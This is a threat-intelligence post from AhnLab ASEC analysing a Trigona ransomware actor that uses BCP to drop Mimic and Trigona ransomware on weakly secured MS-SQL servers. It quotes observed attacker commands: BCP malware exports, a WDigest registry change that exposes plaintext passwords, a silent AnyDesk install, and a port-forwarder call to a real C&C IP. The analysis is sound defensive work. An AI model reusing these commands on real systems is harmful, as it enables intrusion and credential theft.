Trigona Ransomware Threat Actor Uses Mimic Ransomware
AhnLab SEcurity intelligence Center (ASEC) has recently identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. Like past cases, the recently detected attack targets MS-SQL servers and is notable for exploiting the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process.
- Trigona ransomware: Known to have been active since at least June 2022 [1]; usually targets MS-SQL servers for attacks and is still active.
- Mimic ransomware: First found in June 2022 [2]. In January 2024, a case was identified where a Turkish-speaking threat actor attacked poorly managed MS-SQL servers and installed Mimic [3].
ASEC first discovered a case of attack using BCP to install Mimic in early January 2024. In mid-January 2024, there were similar types of attacks identified where Trigona was installed instead of Mimic. The threat actor’s email address used in Mimic’s ransom note was not found in other attack cases, but Trigona’s ransom note identified later contained an email address that the Trigona threat actor has been using since early 2023 [4].
Accordingly, the attack detected in mid-January 2024 is thought to be launched by the previous Trigona threat actor, who is also believed to be the same attacker behind the Mimic ransomware attack discovered in early January 2024. This is based on the facts that both cases targeted poorly managed MS-SQL servers, BCP was used for malware installation, and the various strings and paths used in attacks were the same. In addition, the same malware was used in each attack case.
1. Trigona Ransomware
Trigona ransomware is developed in Delphi and uses RSA and AES encryption algorithms when encrypting files. A report by Arete in February 2023 confirmed a case of Trigona attacking the ManageEngine vulnerability (CVE-2021-40539) [5]. Also, in April 2023, AhnLab’s ASEC Blog covered a case where it targeted poorly managed MS-SQL servers [6].
MS-SQL servers were targeted again in the recent attack case like cases of 2023, and with the threat actor’s email address saved in the ransom note, it can be confirmed that the recently detected Trigona ransomware’s threat actor is the same attacker responsible for previous cases.
- Email: farusbig@tutanota[.]com
- URL: hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/
Figure 1. Encrypted files and a ransom note
2. Mimic Ransomware
Mimic ransomware is known for exploiting a file search program called Everything while looking for files to encrypt. The threat actor is believed to be employing the Everything tool to accelerate the encryption of files in the target system. The attacker also copied some features of Conti ransomware the source code of which was leaked during the development stage [7].
The Mimic ransomware samples in the Trend Micro report released in January 2023 and the Securonix report released in January 2024 almost had the same external structure as the one used in this attack. The malware was made into a 7z SFX executable and contains a compressed file named “Everything64.dll” which is a password-protected collection of the actual malware files and the Everything tool. When the malware is executed, the 7z and “Everything64.dll” compressed files are decompressed using the appropriate passwords as shown below.
| > 7za.exe x -y -p58042791667523172 Everything64.dll > 7za.exe x -y -p624417568130113444 Everything64.dll |
Figure 2. Files included in 7z SFX and the compressed file
The folder that is ultimately installed not only contains Mimic ransomware and the Everything tool, but also the Defender Control tool (DC.exe) for deactivating Windows Defender and the SDelete tool (xdel.exe) of Sysinternals.
Figure 3. Installed files
The threat actor’s email address in the ransom note is different from those used in the Mimic ransomware samples in the January 2023 Trend Micro report and the January 2024 Securonix report, and it is not found in other attack cases either. On the other hand, it is presumed that the Trigona ransomware threat actor is also using Mimic in their attacks based on multiple circumstances that will be discussed later in this post.
- Email: getmydata@list.ru
Figure 4. Encrypted files and a ransom note
3. Malware Installed Using BCP
Attack targets are deemed to be poorly managed and externally exposed MS-SQL servers that have simple account credentials, rendering them vulnerable to brute force or dictionary attacks. This can be inferred not only from the fact that the Trigona ransomware threat actor has been targeting these systems in attacks from the past, but also from infection logs of malware including LoveMiner and Remcos RAT from before and after the respective attack processes.
3.1. Files Created Using BCP
The BCP utility bcp.exe is a command line tool used to import or export high volumes of external data in MS-SQL servers. It is generally used to save large amounts of data saved in the tables of the SQL servers as a local file or to export data files saved in the local system to the SQL server tables.
Threat actors that target MS-SQL servers typically use PowerShell commands to download malware. Recently, some have been exploiting SQLPS, a PowerShell tool included in SQL servers [8]. However, in the case of this attack case, the threat actor most likely employed the method of saving their malware in a database and using BCP to create a local file from it.
Figure 5. Creating malware using BCP
The threat actor used the following command in “uGnzBdZbsi”, the table containing the Trigona ransomware binary, to export Trigona to a local path. Note that “FODsOZKgAU.txt” is a format file that is thought to contain format information.
Figure 6. BCP command used in the attacks
The following are BCP commands used to export various malware and tools used in the attacks.
- Anydesk
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\AD.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Port forwarder malware
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\4.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Launcher malware
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\pp2.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\pp2.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Mimic ransomware
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\K2K.txt” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\K3K.txt” -T -f “C:\users\%ASD%\FODsOZKgAU.txt” - Trigona ransomware
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\build.txt” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Others
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kkk.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kur.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\kkk.bat” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
3.2. Looking Up Information
The commands that the threat actor first executes before creating the malware with BCP (meaning that the attack was successful) are those that look up the infected system’s information as shown below. The threat actor would install malware suitable for the environment based on the information gained through these commands.
| > hostname > whoami > wmic computersystem get domain > wmic computersystem get totalphysicalmemory |
3.3. Stealing Account Credentials
The Trigona threat actor is known to use Mimikatz to steal account credentials [9] [10]. While no logs of Mimikatz were found in the attack process, the attacker sometimes executed a command to configure the UseLogonCredential registry key to obtain the plain text password using the WDigest security package.
| > REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest” /v UseLogonCredential /t REG_DWORD /d 0x00000001 |
3.4. AnyDesk
In addition, the threat actor installed AnyDesk to control the infected system. AnyDesk is a remote administration tool that provides various features such as remote desktop and file transfer. Remote desktop is a feature that allows a user to remotely access an environment installed with RDP or AnyDesk and control it in the GUI environment.
AnyDesk is a major remote administration tool exploited not only by the aforementioned Trigona ransomware attacker, but also by most threat groups. There are many cases where remote administration tools are used for legitimate purposes such as working from home or remote control and management. Accordingly, anti-malware products cannot simply detect and block these tools, unlike typical malware. Threat actors take advantage of this fact to install remote administration tools instead of RAT-type malware during the initial access or lateral movement phases to control the target system.
| > %SystemDrive%\users\%ASD%\music\AD.exe –install C:\”Program Files (x86)”\ –silent > %SystemDrive%\”Program Files (x86)”\AnyDesk-ad_1514b2f9.exe –get-id” |
4. Analysis of Malware Used in the Attack
Besides using BCP, another notable fact for the recent attack cases confirmed is that there is evidence of safe mode being utilized. Two additional malware deemed to have been created by the threat actor were also found in the Mimic and Trigona ransomware attacks.
One is a launcher that registers itself as a service that can run even in safe mode. When it is run as a service, it executes the program given as an argument. The other is a port forwarder malware which, like the launcher, registers itself as a service that can be run in safe mode. It then activates RDP and supports RDP port forwarding to the address given as an argument.
According to the PDB information, the threat actor named the launcher malware “app2” and the port forwarder “client”.
Figure 7. Malware strains created by the threat actor with similar PDB information
Although no malware or command log that sets the system boot option to safe mode was found, logs of the MS-SQL server process executing a system restart command were identified as shown below. As the launcher deactivated the safe mode boot option after executing the malware given as an argument, it is likely that the threat actor installed the malware and then rebooted the system in safe mode to run the ransomware.
| > shutdown -r -f -t 5 |
4.1. Launcher Malware
The threat actor executed the launcher malware with the argument shown below. Upon execution, the launcher copies itself into the “C:\windows\temp\LeVfeNXHoa” path. It then carries out the next task according to the given argument. The first argument gives the service name and the second argument gives the path of the file to be copied. The file in the path given by the second argument is moved to the path given by the third argument. The file given through the second argument was the Mimic ransomware.
| > %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE” |
The launcher registers itself as a service under the name “1111111” which was given as the first argument and runs additional tasks to allow itself to be run in safe mode. Afterward, it executes the ransomware in the path given as the third argument while running as a service. When the process is complete, it deactivates the safe mode option, allowing the system to be booted up normally again.
Figure 8. Routine of setting the safe mode option for the registered service and deactivating this option after executing the ransomware
4.2. Port Forwarder
The threat actor gave the following argument to execute the port forwarder malware. Port forwarding is a feature where data transmitted from a certain port is forwarded to another port. This malware supports port forwarding to the RDP service, or port 3389. Generally, RDP-related port forwarding tools are used to overcome the fact that the threat actor cannot directly access the NAT environment from outside.
The port forwarder first connects to the threat actor’s address using the reverse connection method and then connects to the RDP port of the infected system, relaying the two connections. Accordingly, the threat actor is able to establish an RDP connection even if the target system is running in a NAT environment, allowing them to control the infected system remotely. Because RDP is utilized in this manner, malware may execute the following commands to additionally enable the RDP service.
Figure 9. RDP service activation routine
When the port forwarder is executed in installation mode, it copies itself into the “C:\windows\temp\WindowsHostServicess.exe” path and registers itself as a service under the name “WindowsHostServicess”. The service is configured so that it can be run in safe mode like the launcher malware above.
| > %SystemDrive%\users\%ASD%\music\4.exe –ip “2.57.149[.]233” –port “3366” –install |
The port forwarder has five arguments. Three of these are modes that support the installation, uninstallation, and execution features. In execution mode, it does not go through the service installation process mentioned above and instead connects to the C&C server given as an argument to support port forwarding.
| Argument | Description |
|---|---|
| –install | Installation mode |
| –uninstall | Uninstallation mode |
| –run | Execution mode |
| –ip | C&C server’s IP address |
| –port | C&C server’s port number |
Table 1. Port forwarder arguments
Before connecting to the C&C server, it saves basic system information such as the OS info and user and computer names in the “C:\windows\temp\elZDk6geQ8” path, transmitting the information upon the initial connection.
Figure 10. System information forwarded to the C&C server
Then, it can perform port forwarding or auto-deletion commands based on the commands it receives from the C&C server.
| Command | Feature |
|---|---|
| 0x8CC03FAF | Start port forwarding between the C&C server and the RDP service |
| 0x0002C684 | Auto-delete |
Table 2. Port forwarder arguments
5. Conclusion
Recently, the Trigona ransomware threat actor has been installing the Mimic and Trigona ransomware on poorly managed MS-SQL servers. It has been found that the attacker also attempted to use malware for port forwarding to establish an RDP connection to the infected system and control it remotely.
Ransomware threat actors encrypt infected systems and extort sensitive information to threaten the victims to raise profits. Because they employ various techniques for account credential theft and lateral movement, single systems as well as the entire internal company network may be at risk of being compromised, resulting in having sensitive data stolen and systems in the network encrypted.
Typical attacks that target MS-SQL servers include brute force attacks and dictionary attacks to systems where account credentials are poorly being managed. Administrators must use passwords that cannot be easily guessed and change them periodically to protect the database servers from brute force and dictionary attacks.
V3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors. If the above measures are not taken in advance, continuous infections by threat actors and malware can occur.
File Detection
– Trojan/Win.Generic.R531737 (2022.10.27.00)
– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)
– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)
– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)
– Trojan/Win.Agent.C5574264 (2024.01.14.03)
– Trojan/Win.Agent.C5574265 (2024.01.14.03)
Behavior Detection
– Malware/MDP.Minipulate.M71
– Persistence/MDP.AutoRun.M203
– DefenseEvasion/MDP.ModifyRegistry.M1234
– Ransom/MDP.Decoy.M1171
– CredentialAccess/MDP.Mimikatz.M4367
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
